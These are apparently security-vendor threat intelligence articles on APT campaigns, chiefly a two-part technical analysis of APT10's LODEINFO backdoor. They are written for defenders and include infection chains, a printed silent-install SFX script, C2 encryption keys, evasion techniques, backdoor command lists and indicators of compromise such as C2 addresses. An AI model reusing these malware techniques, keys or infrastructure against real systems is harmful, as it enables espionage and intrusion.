For over a decade, the Tropic Trooper APT actor has been actively targeting victims in East and Southeast Asia. We have been tracking this threat actor for several years and previously published an APT threat report describing its malicious operations. Earlier this year, Symantec published a report describing a campaign called Antlion, which has been observed targeting financial institutions in Taiwan. While analyzing the IoCs of this campaign, we found strong connections with the Tropic Trooper threat actor, leading us to conclude that this group is behind the Antlion campaign. In our investigation, we discovered and studied different attacks conducted by this threat actor using the malware families described in Symantec’s blog post, together with new versions of the malware we reported in one of our reports on Tropic Trooper a few years ago. We managed to uncover the infection chain for these attacks, the attack infrastructure, lateral movement and post-exploitation activities carried out by this actor. Besides the finance sector, additional target verticals include the tech hardware and semiconductors industry, as well as a political entity. Furthermore, we discovered a previously unknown, multi-module backdoor deployed to a victim machine in August 2021 that uses the MQTT protocol for network communication with its C2 server. Tracing the history of this backdoor, it appears the module has been used by this threat actor since at least 2019 and only with a select set of targets.

Kimsuky is a prolific and active threat actor primarily targeting North Korea-related entities. Like other sophisticated adversaries, this group also updates its tools frequently. Recently, however, we had a chance to take a thorough look at how they configure their C2 servers and what kind of tricks they use to confirm and further validate their victims. The Kimsuky group configured multi-stage C2 servers with various commercial hosting services located around the world. We believe the attacks occur in several stages. First, the actor sends a spear-phishing email to the potential victim with a lure to download additional documents. If the victim clicks the link, it results in a connection to the first stage C2 server, with an email address as a parameter. The first stage C2 server verifies that the incoming email address parameter is an expected one and delivers the malicious document if it’s in the target list. The first stage script also forwards the victim’s IP address to the next stage server. When the fetched document is opened, it connects to the second C2 server. The corresponding script on the second C2 server checks the IP address forwarded from the first stage server, to verify that it’s an expected request from the same victim. Using this IP validation scheme, the actor verifies whether the incoming request is from the victim or not. On top of that, the operator relies on several other processes to carefully deliver the next payload. Another C2 script on the second C2 server checks operating system type and predefined user-agent strings, to filter out requests from security researchers or auto-analysis systems. Our research underlines how the Kimsuky threat actor pays close attention to validating legitimate victims and delivering the next stage payloads to them.

Following our analysis report on Dropping Elephant’s activities last year, we continued to track this threat actor’s activities. The group has remained very active over the past year: we investigated numerous attacks against military, diplomatic and educational institutions in Pakistan and China. From analysis of the samples we collected, it’s clear that Dropping Elephant did not discard its traditional JakyllHyde RAT (aka BadNews), but in recent attacks we have seen a shift towards using PubFantacy, and we’ve even seen some features of JakyllHyde ported to PubFantacy. At the same time, we also found new malware developed using Delphi. Dropping Elephant’s main attack methods are still phishing and attacking vulnerable Office suites. Where CVE-2017-0261 was used before, CVE-2017-11228 replaces it.

Other interesting discoveries

On July 30, an actor going by the name Adastrea posted a message on two dark web forums that they were selling 60GB of confidential and restricted information belonging to MBDA, NATO, and the Italian Ministry of Defense. Adastrea is a brand-new account and defines itself as an independent group of specialists and researchers in cybersecurity. In another post on August 10, the actor offered 500MB of military intelligence data reportedly stolen from the Philippines. We weren’t able to acquire and analyze that leak. In its post from July, the threat actor also shared demo files hosted on MEGA (only 47MB), and wrote that they would discuss prices for the leak in a private chat, sharing their XMPP account and a Protonmail email address. Following these statements, MBDA denied any compromise in a press release. A week later, on August 7, the threat actor posted new evidence of exfiltrated data. Kaspersky ICS-CERT was able to obtain parts of the private exfiltrated data, which was analyzed with the help of the Kaspersky Global Research and Analysis Team to better understand the TTPs and veracity of the forum posts made by the threat actor.

We discovered a previously unknown backdoor in active use since at least December 2020. This backdoor’s primary purpose is to log and exfiltrate passwords, matching the functionality of the Security Support Provider (SSP) DLL it leverages. Along with the gathered passwords, the backdoor collects typical information about the infected system and provides the attacker with several commands to manipulate and execute files. This backdoor comprises an encrypted shellcode that allows the attacker to execute arbitrary code received over an encrypted channel. We have found a very limited set of victims in Japan and Ethiopia, and no ties to previously known malware families or threat actors.

In September, we published our analysis of Metatron, a new and very sophisticated malware platform that has been used to target telecoms companies, ISPs and universities in the Middle East and Africa. Metatron is a modular implant boot-strapped through a Microsoft Console Debugger script. The backdoor supports multiple transport modes and offers forwarding and port knocking features: it implements 67 different commands. The original samples were provided by SentinelOne and analysed in collaboration with them.

Final thoughts

While the TTPs of some threat actors remain consistent over time, relying heavily on social engineering as a means of gaining a foothold in a target organization or compromising an individual’s device, others refresh their toolsets and extend the scope of their activities. Our regular quarterly reviews are intended to highlight the key developments of APT groups.

Here are the main trends that we’ve seen in Q3 2022:

  • APT campaigns are very widely spread geographically. This quarter, we have seen actors expand their attacks into Europe, the US, Korea, Brazil, the Middle East and various parts of Asia.
  • The targets chosen by APT threat actors are equally diverse. They include government and diplomatic bodies, defense contractors, the finance sector, the tech hardware and semiconductors sector and IT recruitment and gambling sectors.
  • Geopolitics remains a key driver of APT development and cyber-espionage continues to be a prime aim of APT campaigns. However, the use of ransomware by Andariel illustrates that this isn’t the only motive for APT attacks.

As always, we would note that our reports are the product of our visibility into the threat landscape. However, it should be borne in mind that, while we strive to continually improve, there is always the possibility that other sophisticated attacks may fly under our radar.

Disclaimer: when referring to APT groups as Russian-speaking, Chinese-speaking or “other”-speaking languages, we refer to various artefacts used by the groups (such as malware debugging strings, comments found in scripts, etc.) containing words in these languages, based on the information we obtained directly or that is otherwise publicly known and widely reported. The use of certain languages does not necessarily indicate a specific geographic relation, but rather points to the languages that the developers behind these APT artefacts use.

APT10: Tracking down LODEINFO 2022, part II

31 Říjen, 2022 - 09:00

In the previous publication ‘Tracking down LODEINFO 2022, part I‘, we mentioned that the initial infection methods vary in different attack scenarios and that the LODEINFO shellcode was regularly updated for use with each infection vector. In this article, we discuss improvements made to the LODEINFO backdoor shellcode in 2022.

Kaspersky investigated new versions of LODEINFO shellcode, namely v0.5.9, v0.6.2, v0.6.3 and v0.6.5, in March, April and June, respectively. The following chart shows the evolution timeline of this malware since its discovery.

Timeline of LODEINFO releases

LODEINFO v0.5.6: multiple encryption for C2 communication with ancient crypto algorithm

This LODEINFO v0.5.6 shellcode extracted from a loader module demonstrates several enhanced evasion techniques for certain security products, as well as three new backdoor commands implemented by the developer.

After infecting the target machine, the LODEINFO backdoor beacons out machine information to the C2, such as current time, ANSI code page (ACP) identifier, MAC address and hostname. The beacon also contains a hardcoded key (NV4HDOeOVyL) used later by the age-old Vigenere cipher. Furthermore, randomly generated junk data is appended to the end of the data, possibly to evade beaconing detection based on packet size.

Vigenere cipher key and randomly generated junk data added in LODEINFO v0.5.6

In December 2021, we discovered LODEINFO v0.5.8, with a slight modification that added the LODEINFO implant version number right after the Vigenere cipher key.

The encryption function used to send data was also modified, making it even more complicated. As observed in previous variants, it takes the first 48 bytes of the SHA512 hash value of the data to be sent. Then it XORs the data using a four-byte XOR key that is equal to the elapsed running time, and prepends it before the data. The first 16 bytes to be sent are from another SHA512 hash value, this time taken from the previously mentioned hardcoded AES key (NV4HDOeOVyL). It encrypts 11 bytes at the end of a base64-encoded payload (with replaced padding from “=” to “.”) to dynamically generate the second Vigenere cipher key and the variable of the final generated data. The second key is used by the Vigenere cipher to encrypt the base64 encoded header (url-safe replaced padding from “=” to “.”).

Crypto algorithms and data flow in C2 communications

Finally, the data to be sent to the C2 is produced using the second key, the encrypted header, and the payload through the complex steps described above. The final data packet structure is as follows:

Offset Description Crypto algorithm 0x00 11 bytes from the end of the payload Vigenere cipher 0x0C A delimiter N/A 0x0D Message header

Offset Description 0x00 The first 16 bytes of SHA512 value calculated from the hardcoded AES key. 0x10 Size of base64 encoded payload 0x15 A byte of unknown data base64 (url-safe and replaced padding from “=” to “.”)

Vigenere cipher 0x29 Message payload:

Offset Description 0x00 XORed the first 48 bytes of SHA512 value calculated from the following AES encrypted data (offset 0x36), the XOR key equals the elapsed running time. 0x30 XORed size of encrypted data 0x35 1 byte XOR key for size of encrypted data (offset 0x30) 0x36 Encrypted data by AES CBC mode with the hardcoded AES key “88 8C A3 F2 87 36 CC 12 A5 90 18 56 13 B7 C0 A7 E1 07 D4 5C 7D 47 37 AD AB A3 8C C2 12 E3 03 AC” and IV “83 01 36 C9 3A 2D 13 29 23 56 78 A1 F1 0C D1 75”. The data contains elapsed running time, current time, ANSII Code Page, MAC address, host name, etc. base64 (url-safe with replaced padding from “=” to “.”) LODEINFO v0.5.6: 2-byte XOR obfuscation for backdoor command identifiers

This update included revised crypto algorithms and backdoor command identifiers that were defined as four-byte hardcoded values in previous LODEINFO shellcodes. LODEINFO v0.5.6 backdoor command identifiers are obfuscated with a two-byte XOR operation. Before comparing a command identifier, an XOR operation is applied for each command. The hardcoded XOR key differs for each command as follows:

Two-byte XOR for four-byte stack strings of backdoor command identifiers

We also observed the actor implementing new backdoor commands such as “comc”, “autorun”, and “config” in LODEINFO v0.5.6 and later versions. Twenty-one backdoor commands, including three new commands, are embedded in the LODEINFO backdoor to control the victim host.

LODEINFO v0.5.9: hashing algorithm to get API functions

Version 0.5.9 has a new hash calculation algorithm compared to v0.5.8. The hashing algorithm is used by the malware to calculate hashes for API function names, to resolve the function addresses. In this case it seems to be a custom algorithm developed by the actor. The logic of the hash calculation has an XOR operation with a two-byte key at the end and the hardcoded XOR key, which is different in each sample.

Changed hash calculation algorithm and additional two-byte XOR key in v0.5.9

This modification suggests the attacker’s goal was to evade signature-based detections and make the reverse engineering process more difficult for security researchers.

LODEINFO v0.6.2: evasion of en_US environment

In LODEINFO v0.6.2 and later versions, the shellcode has a new feature that looks for the “en_US” locale on the victim’s machine in a recursive function and halts execution if that locale is found.

Recursive call if the “en-US” locale is found

According to our own investigations, as well as open-source intelligence collected on this malware, the main targets of these attacks are Japanese entities. The aim of this feature, therefore, is to evade execution in sandboxes and on researcher machines, something that occurs most commonly in an English-language locale.

LODEINFO v0.6.2: generating user agent for C2 communications

The function responsible for generating the user agent for C2 communication has also been updated from v0.6.2. The malware generates the user agent string using the following hardcoded formatted string, where the %s is substituted with the version number of the installed chrome.exe application:

“Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/%s Safari/537.36″.

The malware gets the version number of the installed chrome.exe from the EXE file present at one of the following file paths:

  • C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
  • C:\Program Files\Google\Chrome\Application\chrome.exe
  • C:\Users\Administrator\AppData\Local\Google\Chrome\Application\chrome.exe

Otherwise, if none of these files exists on the system, the malware uses the hardcoded version 98.0.4758.102 to create the following user agent string:

  • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
LODEINFO v0.6.2: supporting the injection of the 64-bit shellcode in ‘memory’ command

Based on our deep analysis of this version, we discovered a very interesting update in the shellcode loading scheme implemented from version v0.6.2, in the function that handles the ‘memory’ command.

Checking the OS architecture and the next shellcode architecture

During the memory injection process, performed using the function responsible for the memory command, the malware checks the first byte of the second stage shellcode to determine the shellcode architecture using a magic hex value. If the first byte is 0xE9, the architecture is 32-bit, and if it is 0x8D, the architecture is 64-bit. After the check is completed, if the first byte was 0x8D, it gets replaced with 0xE9 in order for the shellcode to execute properly. In the function shown below, the malware checks the OS architecture of the infected machine and handles the appropriate loading scheme according to OS architecture and shellcode architecture.

Memory injection of the 64-bit shellcode was supported in v0.6.2

In the shellcode injection process, it uses the basic Windows APIs such as VirtualAllocEx(), WriteProcessMemory() and CreateRemoteThread() for memory injection of the 32-bit shellcode and NtAllocateVirtualMemory(), NtWriteVirtualMemory() and RtlCreateUserThread() for supporting the memory injection of the 64-bit shellcode.

LODEINFO v0.6.3: reducing backdoor commands

As for updates implemented in the LODEINFO backdoor commands, the obfuscation method using two-byte XOR encryption for backdoor command identifiers as well as the debug strings remained untouched up to version 0.5.6. However, in version 0.6.3, the actor removed some of the unnecessary backdoor commands to improve the efficiency of the backdoor. The number of backdoor commands was reduced from 21 in v0.6.2 to 11 in v0.6.3. The modifications to the C2 command list are shown in the table below.

Command Description and updates Implemented since version Presence of commands in v0.6.3 – v0.6.5 command Show embedded backdoor command list. v0.1.2 Available send Download a file from C2. v0.1.2 Available recv Upload a file to C2. v0.1.2 Available memory Inject the shellcode in memory. This command has been updated to support the 64-bit shellcode in v0.6.2 and later versions. v0.1.2 Available kill Kill a process using process ID. v0.1.2 Available cd Change directory. v0.1.2 Available ver Send malware and system information including current OS version, malware version, process ID, EXE file path, system username, current directory, C2 and Mutex name. v0.1.2 Available print Make a screenshot. v0.3.1 Available ransom Encrypt files by a generated AES key, which is also encrypted with RSA using the hardcoded RSA key.

(Shows a “Not available.” message in v0.3.5) v0.3.8 Available comc Execute command using WMI. v0.5.6 Available config Just shows a “Not available.” message from v0.5.6 until v0.6.5. v0.5.6 Available ls Get a file list. v0.1.2 Removed rm Delete a file. v0.3.1 Removed mv Move a file. v0.4.8 Removed cp Copy a file. v0.4.8 Removed cat Upload a file to C2. v0.1.2 Removed mkdir Make a directory. v0.4.8 Removed keylog Check for Japanese keyboard layout.

Save keystrokes, datetime and active window name. Uses 1-byte XOR encryption and a file %temp%\%hostname%.tmp.

(Shows a message “Not available.” in v0.3.5.) v0.4.1 Removed ps Show process list. v0.4.6 Removed pkill Terminate a process. v0.4.6 Removed autorun Set/delete persistence. v0.5.6 Removed Conclusions

LODEINFO malware is updated very frequently and continues to actively target Japanese organizations. At the time of writing this report, in September 2022, we detected v0.6.6 and v0.6.7 with new TTPs.

One of the core modifications of the LODEINFO shellcode was support for Intel 64-bit architecture, to expand the targeted victim environments. The updated TTPs and improvements in LODEINFO and related malware, such as the implementation of the Vigenere cipher, complex infection flow with fileless malware, partial XOR encryption, C2 communication packets with a unique data structure and variable length, and password-protected documents, indicate that the attacker is particularly focused on making detection, analysis and investigation harder for security researchers.

For this reason, it becomes more and more difficult to keep track of this actor. That is why we believe it is important to emphasize collaboration within the security research community, to share our results and findings about LODEINFO and related malware attacks.

Indicators of compromise Malicious document

da20ff8988198063b56680833c298113

LODEINFO zip implant

89bd9cf51f8e01bc3b6ec025ed5775fc

LODEINFO loader with an embedded BLOB cb2fcd4fd44a7b98af37c6542b198f8d LODEINFO v0.5.9 a0828f194d3835ea218609dd93d87d16 LODEINFO v0.5.9 16cd587529c230b1a6b47b66d3c84fcf LODEINFO v0.5.9 de4c87a05becc78ab2e3f568cd46272c LODEINFO v0.5.9 9066bec5834279ffcb8876f2fdb8752c LODEINFO v0.5.9 016a974e70bbce6161862e0ac01a0211 LODEINFO v0.6.2 d3cae3b6d948ffd17c5a165bad94f857 LODEINFO v0.6.2 16f0b02bf9676d066d245fe0c717ba52 LODEINFO v0.6.2 ff71fadc33b883de934e632ddb4c6b78 LODEINFO v0.6.2 1a5a74453ebb9747b433342d1ba242cc LODEINFO v0.6.2 013ef386b1c792faec51fc550fef063a LODEINFO v0.6.2 da1c9006b493d7e95db4d354c5f0e99f LODEINFO v0.6.2 a8220a76c2fe3f505a7561c3adba5d4a LODEINFO v0.6.3 LOADERINFO loader without a BLOB 26892038ab19c44ba55c84b20083cdbd loads a809231cf901bad9d643494d0eb5a630 c5bdf14982543b71fb419df3b43fbf07 loads c9d724c2c5ae9653045396deaf7e3417 db0bfce29c7c2f076f711cdde2898227 loads ad206315afaa0cd5b42f0fc7b537fefd Binary of LODEINFO with a one-byte XORed shellcode a809231cf901bad9d643494d0eb5a630 LODEINFO v0.6.3 0fcf90fe2f5165286814ab858d6d4f2a LODEINFO v0.6.5 ad206315afaa0cd5b42f0fc7b537fefd LODEINFO v0.6.5 c9d724c2c5ae9653045396deaf7e3417 LODEINFO v0.6.5 f7de43a56bbb271f045851b77656d6bd LODEINFO v0.6.5 Implants that contain LODEINFO loader and a one-byte XORed shellcode

15b80c5e86b8fd08440fe1a9ca9706c9
6780d9241ad4d8de6e78d936fbf5a922

SFX file

76cdb7fe189845a0bc243969dba4e7a3
edc27b958c36b3af5ebc3f775ce0bcc7

Hardcoded C2s

103.175.16[.]39
172.104.72[.]4
172.104.112[.]218
172.105.223[.]216
202.182.108[.]127
45.77.28[.]124
5.8.95[.]174
www.dvdsesso[.]com

APT10: Tracking down LODEINFO 2022, part I

31 Říjen, 2022 - 09:00

Kaspersky has been tracking activities involving the LODEINFO malware family since 2019, looking for new modifications and thoroughly investigating any attacks utilizing those new variants. LODEINFO is sophisticated fileless malware first named in a blogpost from JPCERT/CC in February 2020. The malware was regularly modified and upgraded by the developers to target media, diplomatic, governmental and public sector organizations and think-tanks in Japan.

Japan is likely the main target of LODEINFO

Researchers continued tracking LODEINFO after that. JPCERT/CC and Macnica Networks shared additional updates on LODEINFO activities in a later publication. Kaspersky researchers also shared new findings during the HITCON 2021 conference, covering LODEINFO activities from 2019 to 2020, and revealing high-confidence attribution to APT10.

In March 2022, we observed a Microsoft Word file that was used as the infection vector in some attacks. In June of the same year, a SFX file was discovered targeting the Japanese government or related organizations using a decoy file with Japanese content, as well as utilizing the name of a famous Japanese politician in the filename. A new downloader shellcode named DOWNIISSA that is used to deploy the LODEINFO backdoor was also observed.

The first part of this report will provide technical analysis of the new infection methods such as SFX files and DOWNIISSA along with our findings. The second part will provide technical analysis of the LODEINFO backdoor and the related shellcode for each version of the backdoor with the latest LODEINFO IoCs and related information discovered in 2022.

Customers of Kaspersky Threat Intelligence Service have access to additional private APT reports describing past LODEINFO activities.

Initial infection #1: VBA + DLL sideloading

During our investigation of the attacks in March 2022, we observed a spear-phishing email with a malicious attachment installing malware persistence modules, which consisted of a legitimate EXE file and a malicious DLL file loaded via the DLL sideloading technique. For example, the following section describes a malicious Microsoft Word file (MD5: da20ff8988198063b56680833c298113) that was uploaded to Virustotal. Once the target opens the malicious doc file, a message in Japanese is displayed (インターネットセキュリティ設定によると、ファイルを開くために、上の黄色のドキュメントバーの「編集を有効にする」と「コンテンツの有効化」をクリックしてください。Translation: “According to your internet security settings, click “Enable Editing” and “Enable Content” on the yellow document bar above to open this file.”) to trick the victims into clicking “Enable Content” and enabling the embedded macro.

The message in Japanese to trick the target into clicking “Enable Content” and embedded VBA code

The embedded VBA code creates the folder C:\Users\Public\TMWJPA\ and drops a zip file named GFIUFR.zip (MD5: 89bd9cf51f8e01bc3b6ec025ed5775fc) in the same folder. The GFIUFR.zip contains two files named NRTOLF.exe and K7SysMn1.dll. NRTOLF.exe (MD5: 7f7d8c9c1b6735807aefb0841b78f389) is a digitally signed legitimate EXE file from the K7Security Suite software used for DLL sideloading. K7SysMn1.dll (MD5: cb2fcd4fd44a7b98af37c6542b198f8d) is a malicious DLL sideloaded by NRTOLF.exe. The malicious DLL file contains a loader of the LODEINFO shellcode. This DLL is a known loader module of LODEINFO. It contains a one-byte XOR-encrypted LODEINFO shellcode internally identified by version 0.5.9. This infection method was also used by the threat actor in the previous attacks we investigated.

Apart from this, we discovered two more implants related to LODEINFO that were used in other infection methods in 2022.

Initial infection #2: SFX + DLL sideloading

One of the implants is a self-extracting archive (SFX) file in RAR format (MD5 76cdb7fe189845a0bc243969dba4e7a3) that was also uploaded to Virustotal. Similarly, the archive contains three files named 1.docx, K7SysMn1.dll and K7SysMon.exe, with the self-extracting script commands shown below. There is also a comment added by the malware author written in Japanese that can be translated as “The following comment contains a self-extracting script command”:

Comment = ;以下のコメントは自己解凍スクリプトコマンドを含んでいます( Path=%temp%\ Setup=%temp%\1.docx Setup=%temp%\K7SysMon.Exe Silent=1 Overwrite=1 Date Time Attr Size Compressed Name ------------------- ----- ------------ ------------ ------------------------ 2022-06-14 03:47:04 ....A 11900 9181 1.docx 2021-08-18 18:58:58 ....A 342528 169345 K7SysMn1.dll 2022-04-19 09:44:45 ....A 91464 45247 K7SysMon.Exe ------------------- ----- ------------ ------------ ------------------------ 2022-06-14 03:47:04 445892 223773 3 files

When a targeted user executes this SFX file, the archive drops other files to %temp% dir and opens 1.docx as a decoy containing just a few Japanese words such as 申込書 (“Application”), 名前 (“name”) and メールアドレス (“email address”), as shown on the following screenshot.

Simple decoy document content from 1.docx

While showing the decoy file to the user, the archive script starts K7SysMon.exe, which loads the malicious DLL from K7SysMn1.dll (MD5: a8220a76c2fe3f505a7561c3adba5d4a) via DLL sideloading. The K7SysMn1.dll contains a BLOB with an obfuscated routine not observed in past activities. The embedded BLOB is divided into four-byte chunks, and each part is stored in one of the 50 randomly named export functions of the DLL binary. These export functions reconstruct the BLOB in an allocated buffer and then decode the LODEINFO shellcode using a one-byte XOR key.

Reassembling the payload BLOB from parts

The payload that is eventually deployed by this implant is the LODEINFO v0.6.3.

Initial infection #3: SFX + DLL sideloading + additional BLOB file

We also discovered another similar SFX file named <masked>[1]sns用動画 拡散のお願い.exe (Translation: The spreading request for sns movie of <masked>). The attackers exploited the name of a well-known Japanese politician. The embedded self-extracting script and files are very similar to the previous sample discussed in the Initial Infection #2 section of this article. However, this sample contains an additional file named K7SysMon.Exe.db. Previously observed loader modules had a BLOB with the encrypted shellcode embedded in the executable file, but in this sample K7SysMn1.dll does not contain the BLOB. Instead, the loader module reads the K7SysMon.Exe.db file as the encrypted BLOB and decrypts the shellcode, which is the LODEINFO v0.6.3 backdoor. The title of the SFX file, as well as the document content, displays a request to spread a video of the famous politician for SNS (Social Network Service). We believe this SFX file was spread via a spear-phishing email on June 29, 2022, based on the last archiving timestamp. The file name and the decoy document suggest the target was the Japanese ruling party or a related organization.

On July 4, 2022, another SFX file (MD5 edc27b958c36b3af5ebc3f775ce0bcc7) was discovered. The archived files, the payload and also the C2 address were very similar to the previous sample set. The only notable difference was the Japanese title of the decoy document: “取材のお願い” (“Request for coverage”). We think this SFX file was probably used to target Japanese media companies.

Initial infection #4: VBA + undiscovered downloader shellcode DOWNIISSA

Back in August 2020, we discovered a fileless downloader shellcode dubbed DOWNJPIT, a variant of the LODEINFO malware, and gave a presentation on it at HITCON 2021. In June 2022, we found another fileless downloader shellcode delivered by a password-protected Microsoft Word file. The filename is 日米同盟の抑止力及び対処力の強化.doc (“Enhancing the deterrence and coping power of the Japan-US alliance.doc”). The document file contains malicious macro code that is completely different from previously investigated samples. Once opened, the doc file shows a Japanese message to enable the following VBA code.

Malicious VBA code inside MS Word file found in June 2022

Unlike past samples, such as the one described in the Initial Infection #1 section of this article, where the malicious VBA macro was used to drop different components of the DLL sideloading technique, in this case the malicious macro code injects and loads an embedded shellcode in the memory of the WINWORD.exe process directly. This implant was not present in past activities and the shellcode is also a newly discovered multi-stage downloader shellcode for LODEINFO v0.6.5.

This downloader shellcode was completely different from the DOWNJPIT variant. The new downloader shellcode has two URLs inside:

  • http://172.104.112[.]218/11554.htm
  • http://www.dvdsesso[.]com/11554.htm

We named this new downloader DOWNIISSA, where IISSA is a string derived from 11554 in the file names found in the URLs. The following diagram shows the complicated infection flow from the malicious document file to the final payload downloaded by DOWNIISSA.

LODEINFO infection process via DOWNIISSA

As mentioned earlier, the embedded macro generates the DOWNIISSA shellcode and injects it in the current process (WINWORD.exe). The main downloader code is base64-encoded and placed at the beginning of the DOWNIISSA shellcode, which gets decoded and patched by the shellcode itself.

DOWNIISSA base64 decode and self-patch

After it has been decoded, some important strings are found with a one-byte XOR encryption. For example, the two C2 destination addresses are decrypted in the following code.

XORed C2 destinations embedded in the main function of DOWNIISSA shellcode

DOWNIISSA uses the URLDownloadToFileA() API function to download the BLOB from the URL addresses and drop it as %TEMP%/${temp}.tmp. Then it reads the file into allocated memory in the current process and deletes the downloaded temp file immediately. We confirmed that both URLs served the same binary data that was XORed with the one-byte XOR key stored at the end of the BLOB itself. After XOR decryption, the LODEINFO backdoor shellcode v0.6.5 was found. For the final stage of the infection, DOWNIISSA creates an instance of msiexec.exe and injects the LODEINFO backdoor shellcode in the memory of the process.

This new infection flow involving the DOWNIISSA shellcode has not been seen in previous activities using LODEINFO and is a new TTP in 2022.

Apart from the 11554.htm file found in this sample, we also discovered files with other names such as 3390.htm, 5246.htm and 16412.htm, hosted on the same C2 servers in July 2022. 3390.htm (MD5: 0fcf90fe2f5165286814ab858d6d4f2a) and 11554.htm (MD5: f7de43a56bbb271f045851b77656d6bd) were one-byte XORed LODEINFO v0.6.5 shellcodes downloaded via DOWNIISSA malware. The XOR key for each sample was found at the end of the file. The 5246.htm (MD5: 6780d9241ad4d8de6e78d936fbf5a922) and 16412.htm (MD5: 15b80c5e86b8fd08440fe1a9ca9706c9) files are one-byte XORed unique data structures. The data structure found in the 5246.htm file is shown below:

Offset Data example Descriptions 0x000000 265715 Memory allocation size (probably) 0x000004 265712 The size of this data structure without memory allocation size and data size 0x000008 3 Number of embedded files 0x000009 91464 Data size of embedded file1 0x00000D 13 Filename size of embedded file1 0x00000E ‘K7SysMon.Exe’,0 Filename of file1 0x00001B 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00

B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00

[SKIPPED] The legitimate EXE file for DLL sideloading 0x016563 57856 Data size of embedded file2 0x016567 13 Filename size of embedded file2 0x016568 ‘K7SysMn1.dll’,0 Filename of file2 0x016575 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00

B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00

[SKIPPED] Malicious DLL file that is the loading module of LODEINFO without embedded BLOB 0x024775 116335 Data size of embedded file3 0x024779 16 Filename size of embedded file3 0x02477A ‘K7SysMon.Exe.db’,0 Filename of file3 0x02478A 73 3A 3C 9B 9A CF 11 76 11 DF 8A 1F 5A EF 9F 11 DF 92 C7 59 CC 11 EF 96 CD 11 E7 92 A1 64 EC BF

[SKIPPED] A byte XORed BLOB is read by the loading module to infect LODEINFO v0.6.5. The key is at the end of the data

This data structure contains the names of three files: K7SysMon.exe, K7SysMn1.dll (MD5: c5bdf14982543b71fb419df3b43fbf07) and K7SysMon.exe.db (MD5: c9d724c2c5ae9653045396deaf7e3417). This suggests that an undiscovered downloader module downloads 5246.htm from the C2 to assist with the installation of some embedded files on the victim’s machine.

Conclusions

LODEINFO was first discovered in 2019. LODEINFO and its infection methods have been constantly updated and improved to become a more sophisticated cyber-espionage tool while targeting organizations in Japan. The LODEINFO implants and loader modules were also continuously updated to evade security products and complicate manual analysis by security researchers.

These modifications may serve as a confirmation that the threat actors track publications by security researchers and learn how to update their TTPs and improve their malware. In fact, we haven’t detected any activities involving the LILIMRAT and the DOWNJPIT malware from this threat actor since publishing our investigation results at HITCON 2021. We believe this cat-and-mouse game will continue in the future.

To be continued in Part II…

 

[1] Personal name of Japanese politician was masked to protect their identity.